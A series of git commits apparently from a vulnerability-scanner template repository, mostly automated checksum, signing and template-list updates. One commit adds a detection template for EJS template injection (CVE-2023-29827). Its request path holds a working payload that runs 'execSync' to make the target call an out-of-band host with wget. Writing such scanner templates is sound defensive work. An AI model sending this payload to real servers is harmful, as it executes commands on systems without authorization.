'(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 # digest: 4a0a00473045022033fc40b6ad2baca8ef5a0faf48a297f8e14cac8e720047cf1fe5e96fcc10f293022100cf0c442e4cdd4914c177d6a54eb4d2115d579e4fe66231ee6dab3b91118d424a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 2614f52ab99662c5a3b9b5d60ad7344973d5ca4b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 14 May 2024 13:22:09 +0530 Subject: [PATCH 0949/1768] Create CVE-2023-29827.yaml --- http/cves/2023/CVE-2023-29827.yaml | 43 ++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 http/cves/2023/CVE-2023-29827.yaml diff --git a/http/cves/2023/CVE-2023-29827.yaml b/http/cves/2023/CVE-2023-29827.yaml new file mode 100644 index 0000000000..815a3b4813 --- /dev/null +++ b/http/cves/2023/CVE-2023-29827.yaml @@ -0,0 +1,43 @@ +id: CVE-2023-29827 + +info: + name: Embedded JavaScript(EJS) 3.1.6 - Template Injection + author: ritikchaddha + severity: critical + description: | + ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter. + impact: | + High impact as it enables remote code execution. + remediation: | + Update EJS to the latest version to mitigate the vulnerability. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-29827 + cwe-id: CWE-74 + epss-score: 0.34849 + epss-percentile: 0.97005 + cpe: cpe:2.3:a:ejs:ejs:3.1.9:*:*:*:*:node.js:*:* + metadata: + max-request: 1 + vendor: ejs + product: ejs + framework: node.js + tags: cve,cve2023,ssti,rce,ejs,oast + +http: + - method: GET + path: + - "{{BaseURL}}/page?settings[view%20options][closeDelimiter]=x%22)%3bprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27)%3b//" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: word + part: body + words: + - "You are viewing page number" From eb58a1f3500abdb7e3b34fd36c73ad90ef43b6d0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 14 May 2024 13:38:48 +0530 Subject: [PATCH 0950/1768] added reference --- http/cves/2023/CVE-2023-29827.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/http/cves/2023/CVE-2023-29827.yaml b/http/cves/2023/CVE-2023-29827.yaml index 815a3b4813..5549e07aba 100644 --- a/http/cves/2023/CVE-2023-29827.yaml +++ b/http/cves/2023/CVE-2023-29827.yaml @@ -10,6 +10,10 @@ info: High impact as it enables remote code execution. remediation: | Update EJS to the latest version to mitigate the vulnerability. + reference: + - https://github.com/mde/ejs/issues/720 + - https://github.com/mde/ejs/blob/main/SECURITY.md#out-of-scope-vulnerabilities + - https://nvd.nist.gov/vuln/detail/CVE-2023-29827 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 From 726a7b1ee1a9d955a80a0d078b50c18f78dea935 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 08:23:55 +0000 Subject: [PATCH 0951/1768] Auto Generated New Template Addition List [Tue May 14 08:23:55 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 2521506a46..9803dc95c1 100644 --- a/.new-additions +++ b/.new-additions @@ -5,6 +5,7 @@ http/cves/2023/CVE-2023-45855.yaml http/cves/2024/CVE-2024-0200.yaml http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml +http/exposed-panels/easyvista-panel.yaml http/exposed-panels/matomo-panel.yaml http/exposed-panels/nocodb-panel.yaml http/exposed-panels/qlikview-accesspoint-panel.yaml From df1b12fbae4add9a2c93c2ca5771235fb257c737 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 08:24:00 +0000 Subject: [PATCH 0952/1768] Auto Generated Templates Checksum [Tue May 14 08:24:00 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4dd9ad8040..28e16afb27 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -547,7 +547,7 @@ file/malware/vertex-malware.yaml:dbbbe626d020ae4d7bbd344de80b6a54835ec6b5 file/malware/virusrat-malware.yaml:26139365e8bc1b4ca2b45a9490c34b19f986215e file/malware/wabot-malware.yaml:7d2630471fae89dc585a6cbd284f9bf29e6259d7 file/malware/wannacry-malware.yaml:4d955739e936b2e11fa054b66bb3bcae8b924b49 -file/malware/warp-malware.yaml:7a6eca365d2cc7890bfe29d51c03e3b248372d44 +file/malware/warp-malware.yaml:9c9807f855164bb0900194f0ed48bd194d310ea5 file/malware/xhide-malware.yaml:1014bac698098d85b1de13cce518523719c41021 file/malware/xor-ddos-malware.yaml:f5b4f72a7b0ed38d9d6010429fe0bb69181383ce file/malware/yayih-malware.yaml:d0632e660caa87b47d08a264fd0625d587900dc8 @@ -3758,6 +3758,7 @@ http/exposed-panels/e-mobile-panel.yaml:97952c73a01ba76b8f821e110326a5b8976c077c http/exposed-panels/eMerge-panel.yaml:128223c03da8481549810a42b35e3c8d88a478eb http/exposed-panels/earcu-panel.yaml:7d1924978269db09ab39f7d9bb8fbc89a069ebbc http/exposed-panels/easyjob-panel.yaml:e9d4d870309fc1b13a57009060dc9d7abd9ecef6 +http/exposed-panels/easyvista-panel.yaml:d90cc7e932cc4c14ded7167fdc585c752cd1c1b2 http/exposed-panels/eclipse-birt-panel.yaml:99ec0cc6817e95c7b3b8a7025cb949db688a9229 http/exposed-panels/ecosys-command-center.yaml:b6e297af2f5896e0dcc0a4185eb6bcc5805c1152 http/exposed-panels/edgeos-login.yaml:7021c21f36e9df66be21c539248866415245f8aa @@ -8519,7 +8520,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:babc7e838e9005be6a08c999aa2eebb3e7b4d671 +templates-checksum.txt:2a9f7933ab20dfa35729172c0253f5944cb98e39 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From dd06ab1d32300e5100cdf438d3bb9f2e26d9ea63 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 08:24:35 +0000 Subject: [PATCH 0953/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 8fe50254e8..948394baa9 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -10,6 +10,7 @@ on: - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/exposed-panels/ackee-panel.yaml' - 'http/exposed-panels/craftercms-panel.yaml' + - 'http/exposed-panels/easyvista-panel.yaml' - 'http/exposed-panels/matomo-panel.yaml' - 'http/exposed-panels/nocodb-panel.yaml' - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' From 2c48020d6190685946b52dd5d962e8b5894f1853 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 08:24:42 +0000 Subject: [PATCH 0954/1768] Auto Generated Templates Checksum [Tue May 14 08:24:42 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 28e16afb27..f1f75a2c91 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6746,6 +6746,7 @@ http/technologies/icecast-mediaserver-detect.yaml:e8cd04701c56d72863370946d98a0a http/technologies/icecast-server-detect.yaml:9c420fa5e33996ea06f25259e6d07fbc940e416d http/technologies/identity-server-v3-detect.yaml:1d81d62bf57fbefb494e082d68cb7e5568382f02 http/technologies/ilo-detect.yaml:71e46841d352f772fe4ef93feed925411dd00ad0 +http/technologies/imgproxy-detect.yaml:b26f7167174072110d8a505954a547a394e18569 http/technologies/impresscms-detect.yaml:aed6cbf7a0e39d65461ad18a94870d5498a81ee5 http/technologies/influxdb-version-detect.yaml:f841eecc70b68b122327d0af759d612c344c18c9 http/technologies/interactsh-server.yaml:7b66780d07fddd75e7a107ff31dd20d43a2f1bfe @@ -8520,7 +8521,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2a9f7933ab20dfa35729172c0253f5944cb98e39 +templates-checksum.txt:648e52b53c9f33bd7c3368abf19c1aad2fd6f6c0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 77ac29024cb48bd6f1d3c1a8b77927433f0099b1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 08:25:52 +0000 Subject: [PATCH 0955/1768] Auto Template Signing [Tue May 14 08:25:52 UTC 2024] :robot: --- http/exposed-panels/easyvista-panel.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/easyvista-panel.yaml b/http/exposed-panels/easyvista-panel.yaml index d21e0aea11..7429e53e96 100644 --- a/http/exposed-panels/easyvista-panel.yaml +++ b/http/exposed-panels/easyvista-panel.yaml @@ -32,4 +32,5 @@ http: group: 1 regex: - '(?i)package:\s+"([a-z0-9._-]+)"' - - '(?i)version : ([a-z0-9._-]+)' \ No newline at end of file + - '(?i)version : ([a-z0-9._-]+)' +# digest: 4a0a0047304502202e940a0d921638b03da755b8b6961674e2218da0b375b10c31c34de9181b8c7f022100fb7c93a0c82f313e5ace2cca365dc8d7b6c769efd178287dfd89795b47505360:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From de221abcf61498efcf2a26f76d52f3dd1822a3f6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 08:27:17 +0000 Subject: [PATCH 0956/1768] Auto Generated New Template Addition List [Tue May 14 08:27:17 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 9803dc95c1..d3edf142d4 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,7 @@ http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml http/exposed-panels/easyvista-panel.yaml http/exposed-panels/matomo-panel.yaml +http/exposed-panels/n8n-panel.yaml http/exposed-panels/nocodb-panel.yaml http/exposed-panels/qlikview-accesspoint-panel.yaml http/exposed-panels/unleash-panel.yaml @@ -16,6 +17,7 @@ http/misconfiguration/installer/phpmyfaq-installer.yaml http/misconfiguration/unigui-server-monitor-exposure.yaml http/technologies/apache/apache-answer-detect.yaml http/technologies/craftercms-detect.yaml +http/technologies/imgproxy-detect.yaml http/technologies/statamic-detect.yaml http/technologies/tinyproxy-detect.yaml http/technologies/uni-gui-framework.yaml From 1b8580b7a846abbc07110cd175deddefb22001ef Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 08:27:26 +0000 Subject: [PATCH 0957/1768] Auto Generated Templates Checksum [Tue May 14 08:27:26 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f1f75a2c91..3b7c5f51fd 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3758,7 +3758,7 @@ http/exposed-panels/e-mobile-panel.yaml:97952c73a01ba76b8f821e110326a5b8976c077c http/exposed-panels/eMerge-panel.yaml:128223c03da8481549810a42b35e3c8d88a478eb http/exposed-panels/earcu-panel.yaml:7d1924978269db09ab39f7d9bb8fbc89a069ebbc http/exposed-panels/easyjob-panel.yaml:e9d4d870309fc1b13a57009060dc9d7abd9ecef6 -http/exposed-panels/easyvista-panel.yaml:d90cc7e932cc4c14ded7167fdc585c752cd1c1b2 +http/exposed-panels/easyvista-panel.yaml:a997baadb80031e6e50898c1cb0cd1bf3174902d http/exposed-panels/eclipse-birt-panel.yaml:99ec0cc6817e95c7b3b8a7025cb949db688a9229 http/exposed-panels/ecosys-command-center.yaml:b6e297af2f5896e0dcc0a4185eb6bcc5805c1152 http/exposed-panels/edgeos-login.yaml:7021c21f36e9df66be21c539248866415245f8aa @@ -4075,6 +4075,7 @@ http/exposed-panels/mybb-forum-detect.yaml:4952dbcff061cad8b74587f35167a1f4f1229 http/exposed-panels/mylittleadmin-panel.yaml:877ecb616dac31ac0a797d7442aa0d73c3a27213 http/exposed-panels/mylittlebackup-panel.yaml:aeca8bc7bb4148c692ec3ca9dc0234b20fdb4847 http/exposed-panels/mystrom-panel.yaml:5c96e157c04f47c7dbb0dc608022cc6b9ffd5a82 +http/exposed-panels/n8n-panel.yaml:9109b87a2b31753aaaadb1f30cb4004f80e7fc29 http/exposed-panels/nagios-panel.yaml:0c1f3fc739fa86cf129cb05c6f8a2a3c10b151d6 http/exposed-panels/nagios-xi-panel.yaml:1b0b6e992805420d16f23c964decfec9e9962138 http/exposed-panels/nagvis-panel.yaml:ba54ad10ecee829efd444c6c975cac871ddd03ad @@ -8521,7 +8522,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:648e52b53c9f33bd7c3368abf19c1aad2fd6f6c0 +templates-checksum.txt:26260a0cb9b52cc72381e58f1c17889fc76ccedf wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3c6bc5e2ebce7adfb4ec4eff745aee081ee04bb7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 08:27:57 +0000 Subject: [PATCH 0958/1768] Auto Generated New Template Addition List [Tue May 14 08:27:57 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d3edf142d4..6f179d1d0d 100644 --- a/.new-additions +++ b/.new-additions @@ -9,6 +9,7 @@ http/exposed-panels/easyvista-panel.yaml http/exposed-panels/matomo-panel.yaml http/exposed-panels/n8n-panel.yaml http/exposed-panels/nocodb-panel.yaml +http/exposed-panels/pocketbase-panel.yaml http/exposed-panels/qlikview-accesspoint-panel.yaml http/exposed-panels/unleash-panel.yaml http/honeypot/tpot-honeypot-detect.yaml From 9214b8e8de16f4536f27adc5d99469092697d2f7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 08:28:00 +0000 Subject: [PATCH 0959/1768] Auto Generated Templates Checksum [Tue May 14 08:28:00 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3b7c5f51fd..12a5702e39 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4209,6 +4209,7 @@ http/exposed-panels/plastic-scm-login.yaml:fe6d092c51727b09cb9451654271bd3e5e674 http/exposed-panels/plausible-panel.yaml:618d3a4a135c8e80ca35582a0620bcb2d300c63f http/exposed-panels/plesk-obsidian-login.yaml:7f424a234fc5e054a1186ed9fdf7fa84780e66a6 http/exposed-panels/plesk-onyx-login.yaml:f423044e8413a51421c210b0f4f49445efb4606c +http/exposed-panels/pocketbase-panel.yaml:25abff181c32afb59827557e42ba90e44daf471b http/exposed-panels/polycom-admin-detect.yaml:09ff65e682061de9f992c4c4539615e0a62fdc4c http/exposed-panels/polycom-login.yaml:9dfb75c477c1d850cb3c4e767e5f1027c65c7e01 http/exposed-panels/portainer-panel.yaml:e3b502c10ccb719774f551f98c8676d5b60c0403 @@ -8522,7 +8523,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:26260a0cb9b52cc72381e58f1c17889fc76ccedf +templates-checksum.txt:98a538c2fadfc2c0a43e22982ec06cd7dcaf44fb wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 649614b041d731c35d473bb4718471c443a7abc1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 08:28:00 +0000 Subject: [PATCH 0960/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 948394baa9..0832677638 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -12,6 +12,7 @@ on: - 'http/exposed-panels/craftercms-panel.yaml' - 'http/exposed-panels/easyvista-panel.yaml' - 'http/exposed-panels/matomo-panel.yaml' + - 'http/exposed-panels/n8n-panel.yaml' - 'http/exposed-panels/nocodb-panel.yaml' - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' - 'http/exposed-panels/unleash-panel.yaml' @@ -21,6 +22,7 @@ on: - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' - 'http/technologies/apache/apache-answer-detect.yaml' - 'http/technologies/craftercms-detect.yaml' + - 'http/technologies/imgproxy-detect.yaml' - 'http/technologies/statamic-detect.yaml' - 'http/technologies/tinyproxy-detect.yaml' - 'http/technologies/uni-gui-framework.yaml' From c279f015123344f5b374e20b59ba85fc3383a6c1 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 14 May 2024 13:58:06 +0530 Subject: [PATCH 0961/1768] Update meilisearch-detect.yaml --- http/technologies/meilisearch-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/meilisearch-detect.yaml b/http/technologies/meilisearch-detect.yaml index e63d1994aa..e92e1c09cb 100644 --- a/http/technologies/meilisearch-detect.yaml +++ b/http/technologies/meilisearch-detect.yaml @@ -1,7 +1,7 @@ id: meilisearch-detect info: - name: Meilisearch Detect + name: Meilisearch - Detect author: userdehghani severity: info description: | From 5f6a8f24c221cec3111c819f1887b8bd1ff73249 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 08:28:42 +0000 Subject: [PATCH 0962/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 0832677638..96cb16f0ad 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -14,6 +14,7 @@ on: - 'http/exposed-panels/matomo-panel.yaml' - 'http/exposed-panels/n8n-panel.yaml' - 'http/exposed-panels/nocodb-panel.yaml' + - 'http/exposed-panels/pocketbase-panel.yaml' - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' - 'http/exposed-panels/unleash-panel.yaml' - 'http/honeypot/tpot-honeypot-detect.yaml' From 03b60d4434d38822a243b11e853d5d7642ab7116 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 08:29:12 +0000 Subject: [PATCH 0963/1768] Auto Template Signing [Tue May 14 08:29:12 UTC 2024] :robot: --- http/exposed-panels/n8n-panel.yaml | 1 + http/technologies/imgproxy-detect.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/exposed-panels/n8n-panel.yaml b/http/exposed-panels/n8n-panel.yaml index b7c335adb8..624de3d45d 100644 --- a/http/exposed-panels/n8n-panel.yaml +++ b/http/exposed-panels/n8n-panel.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022059cb68de4684a6a5b94dca8dbf24660e161eecceb07d6a955c1fa897ba7713da02200a3ec6dda7bffc4b05016a3055540bfb789fead4544178489fd6494c108cd483:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/imgproxy-detect.yaml b/http/technologies/imgproxy-detect.yaml index e61b94f7cc..f9df84d1e9 100644 --- a/http/technologies/imgproxy-detect.yaml +++ b/http/technologies/imgproxy-detect.yaml @@ -25,3 +25,4 @@ http: - 'status_code == 200' - 'contains(server, "imgproxy")' condition: and +# digest: 4a0a004730450221008dd8dabb9994876588a503140ed178a1de79fd8d1480c39fa4b046a06bc0363e02205805ad81daf64a85cf31f1e2f77dce657a89048a1c2db57fb59ed2c1ee78b443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 871b5a69625960536068e6d20e0ed6eae7ce73c0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 08:29:17 +0000 Subject: [PATCH 0964/1768] Auto Generated New Template Addition List [Tue May 14 08:29:17 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6f179d1d0d..4b8d4ddbaa 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ http/cves/2024/CVE-2024-0200.yaml http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml http/exposed-panels/easyvista-panel.yaml +http/exposed-panels/ghost-panel.yaml http/exposed-panels/matomo-panel.yaml http/exposed-panels/n8n-panel.yaml http/exposed-panels/nocodb-panel.yaml From b24824117067616066da1bb9bcefab811aa8615f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 08:29:23 +0000 Subject: [PATCH 0965/1768] Auto Generated Templates Checksum [Tue May 14 08:29:23 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 12a5702e39..8d50047ecf 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3840,6 +3840,7 @@ http/exposed-panels/genweb-plus-panel.yaml:722cb54cc9efc1b84972c6d80c994282efb8f http/exposed-panels/geoserver-login-panel.yaml:c62e462b728c52ae197f5b0446ae908f3401a935 http/exposed-panels/gerapy-detect.yaml:724d1afda108c6a2912bcc793046063e26909b86 http/exposed-panels/gespage-panel.yaml:57eee82ad1606862ed17208b8ff03a7cdba0cb16 +http/exposed-panels/ghost-panel.yaml:de0612cb4c27c9c6fc25fc78e71a5f7ece5dc141 http/exposed-panels/gira-homeserver-homepage.yaml:c88f54ceb96676698f89520661b9594f644d6fc2 http/exposed-panels/git-repository-browser.yaml:5b9b836099213deb45e0d441e5cb66224cf5c8a5 http/exposed-panels/gitblit-panel.yaml:8b14a008bde650f9f125c4b930c2908aa6b95334 @@ -8523,7 +8524,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:98a538c2fadfc2c0a43e22982ec06cd7dcaf44fb +templates-checksum.txt:8ba4dfb0611690abdfca9989ff1f95c2d909e742 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e5318cb247a2403c7e0cb6e1537c7f95267547fe Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 08:29:59 +0000 Subject: [PATCH 0966/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 96cb16f0ad..20013269d7 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,6 +11,7 @@ on: - 'http/exposed-panels/ackee-panel.yaml' - 'http/exposed-panels/craftercms-panel.yaml' - 'http/exposed-panels/easyvista-panel.yaml' + - 'http/exposed-panels/ghost-panel.yaml' - 'http/exposed-panels/matomo-panel.yaml' - 'http/exposed-panels/n8n-panel.yaml' - 'http/exposed-panels/nocodb-panel.yaml' From 955d988a871927e87170b961a19bdb947bf8ae38 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 14 May 2024 14:04:52 +0530 Subject: [PATCH 0967/1768] updated matchers --- http/exposed-panels/jfrog-login.yaml | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/http/exposed-panels/jfrog-login.yaml b/http/exposed-panels/jfrog-login.yaml index 8f9d6a30af..437f62cf28 100644 --- a/http/exposed-panels/jfrog-login.yaml +++ b/http/exposed-panels/jfrog-login.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"JFrog" - verified: true tags: panel,jfrog,edb,detect,login http: @@ -24,13 +24,9 @@ http: - '{{BaseURL}}/ui/favicon.ico' stop-at-first-match: true - matchers-condition: or matchers: - - type: word - words: - - 'JFrog' - case-insensitive: true - - type: dsl dsl: + - 'status_code==200 && contains(body, "JFrog")' - "status_code==200 && (\"-595620639\" == mmh3(base64_py(body)))" + condition: or From 13188c78b8c80785ffc16f584333686272812878 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 14 May 2024 08:38:59 +0000 Subject: [PATCH 0969/1768] Auto Generated Templates Checksum [Tue May 14 08:38:59 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8d50047ecf..3189f9ca22 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3954,7 +3954,7 @@ http/exposed-panels/jeedom-panel.yaml:3fb84bbcfa09ce6964cb2dce502f417498bf82b4 http/exposed-panels/jellyseerr-login-panel.yaml:51a7c1b5d8b5e3f8169bbc8abd9941821477fc41 http/exposed-panels/jenkins-api-panel.yaml:0ba41d9daabab4714bcf58808cfc661c9e9310f2 http/exposed-panels/jenkins-login.yaml:89b0f8e296398a825248bd82947ca61fce3c2a7c -http/exposed-panels/jfrog-login.yaml:07f159d0ee368ce3c235933c257e7781cf687890 +http/exposed-panels/jfrog-login.yaml:c9a40806e3a7ffa48d47ce407b6efa9a563faf56 http/exposed-panels/joget/joget-panel.yaml:a7dfc3fd4921ef9b756bc772a6ce004594f1c29f http/exposed-panels/joomla-panel.yaml:c3ea62950f42c467e19f7a5e7760cd69dfd28bd3 http/exposed-panels/jorani-panel.yaml:7dc1efc38bc8c6be36cec66f40d930500c085baf @@ -4076,7 +4076,7 @@ http/exposed-panels/mybb-forum-detect.yaml:4952dbcff061cad8b74587f35167a1f4f1229 http/exposed-panels/mylittleadmin-panel.yaml:877ecb616dac31ac0a797d7442aa0d73c3a27213 http/exposed-panels/mylittlebackup-panel.yaml:aeca8bc7bb4148c692ec3ca9dc0234b20fdb4847 http/exposed-panels/mystrom-panel.yaml:5c96e157c04f47c7dbb0dc608022cc6b9ffd5a82 -http/exposed-panels/n8n-panel.yaml:9109b87a2b31753aaaadb1f30cb4004f80e7fc29 +http/exposed-panels/n8n-panel.yaml:9d42e6a43dd7de68c76bf38cfd681275147517e5 http/exposed-panels/nagios-panel.yaml:0c1f3fc739fa86cf129cb05c6f8a2a3c10b151d6 http/exposed-panels/nagios-xi-panel.yaml:1b0b6e992805420d16f23c964decfec9e9962138 